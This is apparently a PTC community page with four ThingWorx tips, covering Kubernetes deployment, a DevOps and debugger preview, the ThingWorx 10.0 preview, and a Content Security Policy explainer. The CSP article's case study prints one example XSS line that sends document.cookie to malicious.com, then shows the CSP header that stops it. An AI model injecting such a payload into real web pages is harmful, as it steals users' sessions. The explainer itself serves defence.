cancel
Showing results for 
Search instead for 
Did you mean: 
cancel
Showing results for 
Search instead for 
Did you mean: 

ThingWorx Navigate is now Windchill Navigate Learn More

IoT & Connectivity Tips

Sort by:
Containerization has been a cornerstone of modern software deployment, offering well-known benefits like portability, scalability, and consistency across environments. In the industrial IoT (IIoT) space, these advantages are particularly valuable, enabling organizations to manage complex systems with greater agility and efficiency. At PTC, we recognize that while containerization is not new, its application in IIoT continues to evolve, and our platforms—ThingWorx and Kepware—are designed to help you harness its full potential in practical, impactful ways. ThingWorx: Streamlining IIoT with Containerization ThingWorx has supported containerization for some time now allowing users to build ThingWorx Docker Container images and deploy applications with ease, whether on-premises, in the cloud, or in hybrid setups. This approach simplifies the deployment process, reduces configuration overhead, and ensures that your IIoT solutions can scale as your needs grow. For those already familiar with containerization, ThingWorx offers Dockerfiles allowing customers to build, run, and deploy, ThingWorx as Docker Containers for  development and production use cases. See our help center for already available information on this: https://support.ptc.com/help/thingworx/platform/r9.7/en/index.html#page/ThingWorx/Help/Installation/ThingWorxDockerGuide/thingworx_docker_landing_page.html     New Resource: Deploying ThingWorx on Kubernetes As container adoption matures, so does the need for robust orchestration tools. That’s why we’re excited to introduce a new best practices guide for deploying ThingWorx containers on Kubernetes, with a focus on Azure Kubernetes Service (AKS). This guide is designed to help you take the next step in managing your containerized applications at scale, offering information on: Setting up and managing Helm chart repositories. Preparing your Azure environment, including resource groups, virtual networks, and container registries. Creating and managing content repositories for Docker images. Deploying and configuring Azure Kubernetes Service (AKS) clusters. Implementing essential supporting components such as Monitoring Stacks, Certificate Managers, Ingress Controllers, Azure PostgreSQL Databases, and Storage Accounts to facilitate ThingWorx deployment. Detailed steps to deploy ThingWorx in various configurations, including standalone , high availability (HA) , and with eMessage Connector (eMC). Procedures for upgrading ThingWorx deployments   You can access this guide on our GitHub repository: ThingWorx Kubernetes Deployment (twx-k8s). Whether you’re scaling to support thousands of devices or simply looking for more efficient management of your IIoT infrastructure, this guide helps you with the best practices you need to succeed in your containerization efforts for ThingWorx.     Kepware Edge: Connectivity at the Source On the connectivity front, Kepware Edge brings the power of containerization directly to the edge of your operations. By packaging industrial-grade connectivity into a lightweight, container-friendly solution, Kepware Edge allows you to deploy secure, reliable data access right where your machines and devices are located. For more details on how Kepware Edge, check out our recent announcement: PTC Announces Kepware Edge and stay tuned for more updates on the availability of it.     Practical Tools for Your IIoT Journey Improving DevOps for applications built on ThingWorx is a key priority for us at PTC and containerization is a critical piece to it. We invite you to explore these resources and see how they can fit into your existing IIoT solution development workflows. Visit the ThingWorx Kubernetes guide on GitHub and let us know your feedback or any questions around containerization by posting on the IoT community.   Cheers, Ayush Tiwari Director Product Management, ThingWorx
View full tip
Introduction In the dynamic landscape of IoT and industrial applications, development teams often face challenges such as limited visibility into application behavior, fragmented tooling, and time-consuming troubleshooting processes. To address these pain points, PTC has launched a DevOps initiative aimed at strengthening the ThingWorx low-code platform. This initiative delivers key enhancements in debugging, source control, monitoring, alerting, logging, and AI-driven development support. As ThingWorx continues to evolve, our commitment remains centered on improving the day-to-day experience for both developers and administrators. We've been listening closely to your feedback—this new project reflects our response, focusing on smoother DevOps integration and empowering users with deeper control and visibility into their applications. While many enterprises already rely on IT-recommended tools to manage the application lifecycle and Day-2 operations, PTC is committed to complementing these investments by delivering additional capabilities and guidance tailored to the ThingWorx platform. Key features of the new devOps project initiative include real-time debugging and version control, the ability to roll back to previous versions, hot-fix deployments, and distributed team development through seamless integration with repositories like GitHub. Furthermore, streamlined application packaging and deployment significantly simplify the management of ThingWorx-based applications. These enhancements go beyond routine updates and reflect a meaningful evolution in how teams develop, troubleshoot, and optimize IoT applications in production environments.  Debugging : Preview in ThingWorx 10.0   The first major feature introduced under DevOps is the debugging capability, currently available in a private preview (alpha version). Debugging has long been a challenge in ThingWorx applications, where troubleshooting JavaScript code within the platform was often cumbersome and time-consuming. With the new JavaScript Debugger, developers can now debug their scripts directly within ThingWorx Composer, reducing the time spent identifying and fixing issues. This feature brings real-time issue resolution, allowing developers to pinpoint errors efficiently without needing external tools.   Security and seamless integration into the existing ThingWorx environment were critical design considerations for this feature. The debugging actions are logged securely for audit and compliance, ensuring that sensitive information remains protected. Furthermore, support for major browsers such as Chrome, Firefox, Edge, and Safari enhances the accessibility of this feature across different development environments. The debugging capability is expected to significantly improve developer productivity by offering better visibility into JavaScript execution and real-time error tracking, reducing the trial-and-error approach that developers previously relied upon. Here is a brief video offering a preview of upcoming features included in the ThingWorx 10.0 release, with general availability planned for the 10.1 release later this year.   Debugger Capability (Preview) Logging and Monitoring : Continuous improvement   In addition to the new debugging capabilities, we’ve delivered several enhancements focused on monitoring and alerting—specifically designed to support the needs of IT administrators responsible for maintaining the uptime and reliability of ThingWorx environments in the last major release. The integration of OpenTelemetry has transformed logging and performance monitoring, allowing better observability of system operations. This enhancement enables third-party integrations with monitoring tools such as Sumo Logic, Datadog, and Splunk, providing developers and administrators with deeper insights into system performance. These improvements have made ThingWorx more resilient and responsive, allowing teams to proactively detect and address issues before they impact operations. Mashup Builder : Continuous improvement   We have been continuously enhancing Mashup development capabilities, starting with the introduction of Read-Only Mashups in ThingWorx 9.6 and extending through to the latest improvements in recent releases. Also, a new Export Function replaces the legacy Data Export Widget, offering a more secure and efficient data export process. Binding Verification & Debugging introduces a powerful capability to detect and resolve broken bindings after mashup migrations, reducing errors and improving reliability. Improved UI Management features, such as widget highlighting and container zooming, make mashup creation and debugging more intuitive. Additionally, developers can now customize Tab Titles & Favicons, enabling better branding and a more polished user experience for ThingWorx applications. Mash up improvements in ThingWorx 9.7 The Road Ahead: AI-Powered Development and Version Control   The next phase of the DevOps initiative is set to deliver major advancements in source control and AI-driven development. One key enhancement is the addition of IDE-like features for source code management, enabling developers to better track, iterate, and roll back changes. Planned integrations with GitHub and other repositories will support seamless collaboration in distributed teams.   We welcome your feedback as you explore the new Debugger Feature Preview included in the ThingWorx 10.0 release. In parallel, we are actively working with customers and partners to enhance key capabilities such as source code version control and application lifecycle management within the ThingWorx platform. If you're interested in contributing to the future of low-code development, we encourage you to share your thoughts in the comments below—our team will be in touch to connect.   Vineet Khokhar Principal Product Manager, IoT Security Stay tuned for more updates as we approach the release of ThingWorx 10.0, and as always, in case of issues, feel free to reach out to <support.ptc.com>  
View full tip
    April 22, 2025   Hello ThingWorx community members! We are excited to announce the preview release of ThingWorx 10.0, the latest evolution of our IIoT platform for all your Industrial Data Management needs. This release focuses on delivering a powerful, secure, and intelligent foundation for industrial innovation, empowering businesses to achieve more with their IoT solutions. Powerful & Secure: A New Standard in IoT Platforms ThingWorx 10.0 sets a new benchmark for scalability and security in IoT with features like IOT Streams to enhance enterprise industrial data acccess and reliability, caching improvements to increase server scale and response times, and security updates for TLS, Tomcat, Java, and others to ensure top-tier performance and protection. These advancements make ThingWorx 10.0 the most mature and secure platform yet, giving businesses the confidence to scale their IoT deployments while safeguarding their data.   Industrial Solutions: Ready to Drive Performance ThingWorx 10.0 enhances our industrial solutions, advancing connected worker, manufacturing efficiency, and quality use cases. Windchill Navigate View Work Instructions, a powerful, feature-rich app, launches with ThingWorx 10.0. Built on ThingWorx and integrated with Windchill PLM, this task-based solution delivers real-time work instructions, enhancing enterprise collaboration and boosting worker productivity with seamless, intuitive guidance. Alongside Connected Work Cell (CWC), both applications strengthen the connected worker experience in manufacturing with real-time instructions and data. Additionally, enhancements to Real-Time Production Performance Monitoring (RTPPM), and Digital Performance Management (DPM), improve manufacturing performance by optimizing workflows, enhancing service quality, and providing operators with clear, data-driven insights. Data Insights: Unlocking Intelligence from Edge to Cloud ThingWorx 10.0 empowers businesses to harness data-driven intelligence like never before. With advanced analytics and integration with third-party generative AI tools, the platform enables seamless management of industrial data from edge to cloud. Unlock actionable insights and make smarter decisions to stay ahead in a competitive landscape. Get started today The preview release of ThingWorx 10.0 is now available for evaluation. Discover how a powerful, secure, and intelligent IoT platform can transform your industrial operations. Please reach out to your account reps or customer success team to get preview access for this release. Alternatively, drop a comment on this post or submit a Tech Support ticket, and we’ll get in touch with you to discuss onboarding to the ThingWorx 10.0 Private Preview Program.   Lastly watch out this space as we roll out additional details about ThingWorx 10.0 release and other announcements!   Cheers! Ayush Tiwari Director Product Management ThingWorx, a PTC Technology.
View full tip
Introduction    As the Internet of Things (IoT) continues to grow, securing web applications and connected devices is more critical than ever. Content Security Policy (CSP) is a security feature that helps protect IoT applications from malicious threats by controlling which resources—such as scripts, styles, and images—can be loaded and executed in a browser. This article explores what CSP is, the types of attacks it prevents, its role in securing IoT applications, the most common CSP directives used for enhanced security, and a real-world case study demonstrating CSP in action.    What is Content Security Policy (CSP)?    Content Security Policy (CSP) is a web security standard designed to reduce the risk of security vulnerabilities such as Cross-Site Scripting (XSS), data injection, and clickjacking by enforcing strict content-loading policies within web applications. It allows developers to specify which domains are permitted to execute scripts, load images, fetch data, and render styles, ensuring that only trusted sources can interact with the application.    How CSP Works    CSP works by defining security policies through HTTP headers or <meta> tags in the HTML document. These policies restrict the sources from which the browser can load various types of content, including JavaScript, CSS, and images. By doing so, CSP helps prevent unauthorized code execution and ensures that applications only interact with pre-approved content providers.    Why CSP is Essential    In an era where cyber threats are becoming more sophisticated, CSP plays a crucial role in securing web applications by:  Blocking Malicious Scripts: Prevents the execution of unauthorized JavaScript injected by attackers.  Preventing Data Exfiltration: Stops malicious code from sending sensitive user or device data to untrusted servers.  Mitigating Clickjacking: Restricts embedding in iframes to prevent deceptive UI attacks.  Enforcing Trusted Sources: Ensures that all resource requests originate from approved locations.    Types of Attacks Prevented by CSP    CSP acts as a defense mechanism against several types of web security threats, including:    a. Cross-Site Scripting (XSS)  Attackers inject malicious JavaScript into a web page to steal sensitive information, manipulate content, or perform unauthorized actions on behalf of the user.  CSP prevents XSS by restricting the execution of inline scripts and untrusted third-party JavaScript.    b. Clickjacking  Attackers trick users into clicking hidden elements (e.g., disguised buttons or links) within an iframe, potentially leading to account hijacking or unintended actions.  CSP helps mitigate clickjacking by enforcing the frame-ancestors directive, which controls who can embed the application in an iframe.    c. Data Injection Attacks  Attackers inject malicious content into an application, leading to data leaks, corrupted transactions, or manipulated IoT device responses.  CSP limits data injection risks by restricting content sources and enforcing secure policies   d. Mixed Content Attacks  When a secure HTTPS site loads insecure HTTP resources, attackers can intercept or modify the content.  CSP prevents mixed content vulnerabilities by enforcing policies that allow only secure content to be loaded.    Role of CSP in Securing IoT Applications    IoT applications often involve web-based dashboards, real-time analytics, and device interactions, making them attractive targets for cyber threats. CSP plays a crucial role in strengthening security by:    a. Restricting Untrusted Content  IoT platforms often load content dynamically from various sources, including APIs, third-party libraries, and external services. Without CSP, attackers can inject malicious scripts into these data streams, compromising the integrity of IoT dashboards. By defining strict CSP policies, developers can ensure that only pre-approved content sources are allowed.    b. Preventing Unauthorized Data Access  Many IoT applications handle sensitive data, such as real-time sensor readings, user credentials, and system logs. Attackers may attempt to inject malicious scripts that exfiltrate this data to external servers. CSP prevents such unauthorized access by blocking script execution from untrusted origins and preventing cross-origin data leaks.    c. Strengthening Access Control  In IoT ecosystems, multiple users, devices, and services interact with web applications. Without strict access controls, attackers can exploit weak points to execute unauthorized commands or alter data. CSP helps enforce access control by limiting the execution of scripts and API requests to verified sources, ensuring that only authenticated and authorized entities can interact with the system.    d. Minimizing Third-Party Risks  Many IoT applications integrate with third-party analytics tools, mapping services, and external widgets. If these third-party services are compromised, they can introduce vulnerabilities into the IoT ecosystem. CSP allows developers to whitelist only trusted third-party services, reducing the risk of supply chain attacks.    Common CSP Directives for Enhanced Security    To maximize security, developers should implement the following key CSP directives:  default-src: Defines the default source for all types of content (scripts, images, styles, etc.).  connect-src: Governs network requests (e.g., API calls, WebSockets, IoT data exchanges).  font-src: Specifies trusted sources for web fonts.  frame-ancestors: Prevents clickjacking by restricting which domains can embed the application in an iframe.  frame-src: Controls the sources from which iframes can be loaded.  img-src: Specifies trusted sources for loading images.  media-src: Defines allowed sources for media files like audio and video.  object-src: Restricts the sources from which plugins (e.g., Flash, Java applets) can be loaded.  script-src: Controls which sources are allowed to execute JavaScript.  style-src: Restricts the sources for CSS stylesheets.  worker-src: Defines the sources allowed to create web workers and service workers.  By defining a least-privilege CSP policy, developers can significantly reduce the attack surface and protect IoT applications from evolving cyber threats.    Case Study: Preventing an XSS Attack in an Industrial IoT Platform    Scenario:    A manufacturing company uses an Industrial IoT (IIoT) platform to monitor real-time sensor data from its factory machinery. The platform provides a web-based dashboard where engineers can track machine performance, predict failures, and configure alerts.    Attack Attempt:    An attacker exploits a form input field used for naming machines and injects the following malicious script:    <script>fetch('https://malicious.com/steal?data='+document.cookie);</script>    Since the platform lacks CSP enforcement, this script executes within the engineers’ browsers, stealing session cookies and granting unauthorized access to the attacker.    How CSP Prevented the Attack:    By implementing a CSP policy that restricts script execution to trusted sources, the attack is neutralized. The following CSP directive is applied:    Content-Security-Policy: script-src 'self' https://trusted-scripts.com;    This prevents unauthorized script execution, ensuring that malicious scripts injected by attackers do not run within the IIoT platform. As a result, the IIoT system remains secure, preventing attackers from compromising sensitive factory data or disrupting production operations.    Conclusion    Content Security Policy (CSP) is a fundamental security measure for modern web applications, particularly those operating in IoT environments. By understanding CSP, recognizing the threats it mitigates, and implementing the most effective directives, developers can ensure a more secure and resilient application framework.    CSP support has been introduced in ThingWorx versions 9.3.15, 9.4.5, 9.5.1, and 9.6.0. In the initial release, this feature will be disabled by default, and cloud customers will need to contact the support team to request activation, as it will not be enabled by default. The current implementation establishes a foundation that facilitates future out-of-the-box (OOTB) enablement of CSP in subsequent releases.   For more information on implementing the Content Security Policy, kindly refer to ThingWorx Help Center   Vineet Khokhar Principal Product Manager, IoT Security   Stay tuned for more updates as we approach the release of ThingWorx v10.0, and as always, in case of issues, feel free to reach out to <support.ptc.com>   
View full tip
Announcements